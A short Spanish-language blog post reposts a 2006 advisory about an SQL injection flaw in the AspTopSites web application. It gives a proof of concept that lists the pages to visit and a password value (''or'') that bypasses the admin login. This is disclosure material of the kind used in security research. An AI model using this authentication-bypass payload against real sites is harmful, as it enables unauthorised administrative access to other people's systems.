ecoestadistica.com

miércoles, enero 11, 2006

AspTopSites SQL injection...

Producto afectado:

AspTopSites
http://www.maine-net.com/aspts.asp

Detalle:

SQL Injection

AspTopSites no filtra el SQL resultando en el acceso completo al menu de administracion

Prueba de Concepto:

La declaracion de SQl injection en el campo de la contraseña causa que la declaración sea verdad.

http://[host]/topsites/default.asp <--- vea las listas
http://[host]/topsites/goto.asp?id=43 <--- mouseover valor de identificacion
http://[host]/topsites/includeloginuser.asp <--- login aqui
user: [ id value ]
password: 'or'

Fuente:hackers-news

Salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com